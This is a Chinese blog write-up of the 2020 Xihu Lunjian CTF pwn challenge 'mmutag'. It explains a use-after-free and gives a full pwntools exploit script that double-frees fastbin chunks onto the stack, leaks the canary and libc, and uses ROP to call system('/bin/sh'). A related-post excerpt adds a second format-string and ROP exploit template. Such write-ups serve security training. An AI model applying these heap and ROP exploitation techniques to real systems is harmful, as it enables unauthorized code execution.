2020 西湖论剑 pwn mmutag

最新推荐文章于 2024-04-17 13:37:01 发布
原创 最新推荐文章于 2024-04-17 13:37:01 发布 · 217 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文介绍了一个名为MMUTag的程序中存在的UAF漏洞,并详细展示了如何通过精心构造的payload来利用这一漏洞实现任意地址读写,最终获取shell的过程。

libc给的是2.23
在这里插入图片描述
在这里插入图片描述
pie没开 RELRO没开全。

在这里插入图片描述
栈地址堆地址都给了。

两个功能

1
在这里插入图片描述
2
在这里插入图片描述主功能的free函数有uaf。
在这里插入图片描述
直接利用就好。

exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')

r = process("./mmutag")
elf = ELF("./mmutag")
libc = ELF("./libc.so.6")

def menu(idx):
    r.recv()
    r.sendline(str(idx))

def delete(idx):
    menu('2')
    r.sendline(str(idx))


def new(idx,content):
    menu('1')
    r.recv()
    r.sendline(str(idx))
    r.recv()
    r.send(str(content))


r.recv()
r.send("\n")
r.recvuntil("this is your tag: ")
addr = eval(r.recv(14))
success("stack_addr: " + hex(addr))
fake_size = addr - 0x40
r.recv()
r.sendline("2")
new(1,'a')
new(2,'a')
delete(1)
delete(2)
delete(1)
new(3,p64(fake_size))
new(4,p64(fake_size))
r.recv()
r.sendline('3')
r.sendline('a'*0x18)
r.recvuntil('a'*0x18+'\n')
canary = u64("\x00"+r.recv(7))
new(5,'a')
layout = p64(0)+p64(0x71)+p64(0)
r.recv()
r.sendline('3')
r.sendline(layout)
payload = "a"*0x8 + p64(canary) + p64(0)
payload = payload + p64(0x400d23) + p64(elf.got['puts']) + p64(elf.plt['puts'])
payload += p64(0x400bf1)  # main
new(6,payload)
r.sendline('4')
r.recvuntil("please input your choise:\n")
libc_addr = u64(r.recv(6).ljust(8,"\x00")) - libc.symbols['puts']
success("libc_addr: " + hex(libc_addr))
r.send("\n")
r.sendline("2")
delete(3)
delete(4)

delete(3)
new(7,p64(fake_size-0x10))
new(8,p64(fake_size-0x10))
r.recv()
r.sendline('3')
r.send(p64(0)+p64(0x71)+"/bin/sh\x00")
new(9,'a')
payload = "/bin/sh\x00" + p64(canary) + "/bin/sh\x00"
payload += p64(0x400d23) + p64(fake_size+0x10) + p64(libc_addr + libc.symbols['system'])

new(10,payload)
r.recv()
r.sendline('4')
r.interactive()
2020 西湖论剑 pwn noleakfmt
yongbaoii的博客
03-29 830
canary没开,方便溢出。 主逻辑简单。 格式化字符串漏洞。 给了我们一个栈地址,但是主要问题是把标准输出关掉了。 我们要利用的呢就是将_IO_2_1_stdout_的_fileno从1改成2,为啥呢? 对于一个FILE结构体来说,最重要的就是_flags和_fileno,_fileno存储的是我们的文件描述符,对于某些情况或许我们要劫持_fileno才能达到我们的目的,而_flags则标志了该FILE的一些行为,这对于我们的泄露至关重要。 我们想办法劫持结构体的_fileno之后就可以从标准错误做一.
2021 西湖论剑 pwn blind
yongbaoii的博客
03-26 689
利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。 通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0) exp #/usr/env/bin python from pwn import * import time context.log_level = "debug" gadget1 = 0x4007ba gadget2 = 0x4007a0 elf = ELF('./blind') read_got = el.
IOT pwn(1)
ccc6553584的博客
04-11 734
thenfibinwalk 固件名称* 固件提取binwalk -e 固件名称* 固件递归提取binwalk -Me 固件名称$ ./fat.pyimport idcl = “”l = b’’return lcode = “”;保存 FP 和 LR 寄存器,其中 FP 寄存器在栈顶。;FP 寄存器指向保存返回地址的位置。;抬升栈顶,开辟栈空间。;
IOT pwn,35岁以后的网络安全程序员出路在哪里
m0_61040489的博客
04-07 1065
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
IOT pwn(1),2024年最新网络安全基础面试题2024
2401_83621541的博客
04-17 1000
先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。 既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!由于文件比较多,这里只是将部分目录截图出来,全套包含大厂
腾讯安全科恩实验室2018年IoT安全白皮书
04-02
腾讯安全科恩实验室2018年IoT安全白皮书;IOT行业发展迅猛,未来6年设备数量或将翻3倍,IOT安全威胁加剧,已有三成企业担心安全问题。
2024西湖论剑WP(reverse_MZ)
ZJPC007的博客
02-05 887
有函数可知,根据转换得到48位的字符串并进行SHA1加密,密文为dc0562f86bec0a38508e704aa9faa347101e1fdb。因为转换过程中有多种可能,所以需要进行一些手搓的步骤,逐渐得到flag。思路大概就是先进行转换然后SHA1加密。逆向板块就做出这一题。
西湖论剑——pwn
weixin_44319142的博客
04-07 653
pwn 这道题目开了canary,和之前的套路相似,就是要泄露canary,利用栈溢出找到system和/bin/sh,拿到访问权限 看一下函数 printf存在格式化字符串漏洞可以用于泄漏canary p.sendlineafter("ID:","%15$p") #不解释了这个要打印的是第十五个参数,也就是canary的值 p.recvuntil("Hello ")#输出hello之后...
西湖论剑WriteUp By Nu1L.pdf
11-26
"西湖论剑WriteUp By Nu1L" 本文档涵盖了多个IT领域的知识点,涵盖了信息安全、密码学、编程语言和算法等领域。下面将逐一介绍这些知识点。 1. Reverse ROR(Reverse Rotate Right):从代码中可以看到,作者使用...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential Brute-Forcer-可配置的暴力破解密码以绕过身份验证控件 主题枚举器-通过一段时间内的连续采样来建立全面的主题列表 有用的信息收集器-从包含已知感兴趣主题的可扩展预定义列表中获取和标记数据 GPS追踪器-使用OwnTracks应用绘制来自设备的路线并收集发布的坐标 Sonoff Exploiter –设计用于提取密码和其他敏感信息 可扩展性-该框架旨在轻松添加新的自定义插件 Shodan-通过Shodan.io
Linux下pwn从入门到放弃
一个码农的笔记
12-15 1万+
0x0 简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。 虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行,传统的缓冲区溢出又一次有了用武之处 0x01 工欲善其事,必先利其器 Linux下的pwn常用到的工具有: (1)gdb:Linux调试中必要用到的 (2)gdb-peda:gdb方便调试的工具,类似的工具有gef,gd
IOT漏洞挖掘学习笔记(一)——堆基础及相关数据结构
weixin_43137410的博客
08-19 1699
1.CTF介绍 线上赛: 答题模式 线下赛: AWD(攻防模式) RealWorld(展示模式) 主要考查漏洞挖掘与利用能力 二进制安全: 栈溢出 栈溢出的防护绕过 堆溢出 堆溢出漏洞 格式化字符串 IOFILE RACE 命令注入 REAL WORLD: IOT漏洞挖掘 浏览器漏洞挖掘 虚拟机逃逸 js解析器 前置知识: 掌握任何一门编程语言 工具使用能力 2.堆溢出 在malloc(分配动态内存) fr
HackPwn2015:IoT智能硬件安全威胁分析
01-23 670
HackPwn2015:IoT智能硬件安全威胁分析 360安全卫士·2015/08/26 14:43 IoT(物联网)是一种既危险又有趣的混合技术,所谓的混合技术包括移动应用程序、蓝牙、Wi-Fi、zigbee、设备固件、服务、API、以及各种网络协议等如图。这些技术从独立上来看都是相对安全且成熟的。但是要将这些技术结合应用起来,没有安全贯穿整个应用流程,就会出现安全问题。...
Pwn基础知识笔记
3569
12-15 4846
http://www.jianshu.com/p/6e528b33e37a pwntools简单语法 作为最好用的pwn工具,简单记一下用法: 连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口 数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制 IO模块:这个比较容易跟zio搞混,记住zio是re
ctf pwn 个人经验记录
jmp esp
05-22 9042
前言记录一下自己在做pwn的过程当中学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道题基本上能学到的新东西是有限的,记录下来避免什么时候想不起来。顺序比较乱,基本上根据我做题的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 1万+
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 7370
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
解决LibcSearcher找不到合适libc(更新libc)
yongbaoii的博客
02-09 7298
1 尝试直接更新 进入LibcSearcher/libc-database中运行./get文件即可进行更新。 可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。 那么就看需要点啥更新点啥,一般是 ./get ubuntu #一般pwn题环境就Ubuntu,所以有第一个
2025 西湖论剑 WP Pwn
最新发布
03-13
### 2025年西湖论剑WP Pwn比赛详情及相关信息 #### 比赛背景 2025年的第八届西湖论剑网络安全技能大赛中的Pwn部分,作为一项高水平的技术竞赛吸引了众多安全研究者和技术爱好者参与[^1]。该赛事主要考察选手在二进制漏洞挖掘与利用方面的技术能力。 #### 参赛队伍概况 虽然具体参赛队伍名单未完全公开,但从往届情况来看,通常由国内外知名高校的安全团队、企业内部红队以及独立白帽黑客组成。这些队伍通过预选赛晋级决赛阶段,在比赛中展示其卓越的技术实力和快速解决问题的能力[^4]。 #### 解题思路概述 以下是基于已有资料总结的一些典型Pwn题目及其解决方法: 1. **Canary泄露与栈溢出** - 题目可能设置了栈保护机制(Stack Canary),攻击者需先通过某种方式泄露Canary值。 - 利用缓冲区溢出覆盖返回地址,并结合ROP链调用`system("/bin/sh")`完成提权操作。 2. **堆风水与UAF (Use After Free)** - 堆管理错误是常见的一类漏洞形式之一。例如程序可能存在释放后重用指针或者大小计算不当等问题。 - 攻击策略包括调整内存布局使得特定数据结构被可控内容填充;进而伪造chunk header实现任意读写功能[^3]。 3. **格式化字符串漏洞** - 当输入参数未经严格校验便传递给printf系列函数时,则可能发生此类问题。 - 使用这种方法可以探知目标进程内部状态(如基址偏移量),为进一步构建payload奠定基础[^2]。 4. **Return-Oriented Programming (ROP) 技巧应用** - 对于开启了NX(non-executable stack)防护措施的目标环境来说,单纯注入shellcode难以奏效。 - 此刻就需要寻找gadgets组合起来执行所需命令序列。 ```python from pwn import * context.arch = 'amd64' elf = ELF('./vuln') libc = elf.libc # Establish connection to service or binary locally/remote. if args.REMOTE: io = remote('challenge.example.com', 1337) else: io = process([elf.path]) # Leak canary value via format string bug. io.recvuntil(b'What is your name? ') fmt_str_payload = b'%15$p.%19$p.' io.sendline(fmt_str_payload) leaked_data = io.recvline().strip() stack_canary, libc_base_leak = map(lambda x:int(x,16), leaked_data.split(b'.')) log.info(f'Stack Canary Value:{hex(stack_canary)}') # Calculate actual addresses based on leaks. base_addr_offset = u64(libc_base_leak.ljust(8,b'\x00')) - libc.symbols['puts'] system_plt = base_addr_offset + libc.symbols['system'] pop_rdi_ret_gadget = next(elf.search(asm('pop rdi; ret'))) bin_sh_string_loc = next(elf.search(b'/bin/sh\x00')) exploit_chain = flat([ pop_rdi_ret_gadget, bin_sh_string_loc, system_plt ]) offset_to_overwrite_return_address = cyclic_find(0x61616161) # Replace with correct offset found during fuzzing phase. final_exploit_buffer = fit({ offset_to_overwrite_return_address : exploit_chain },filler=b'A'*offset_to_overwrite_return_address) io.interactive() if args.DEBUG else None ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值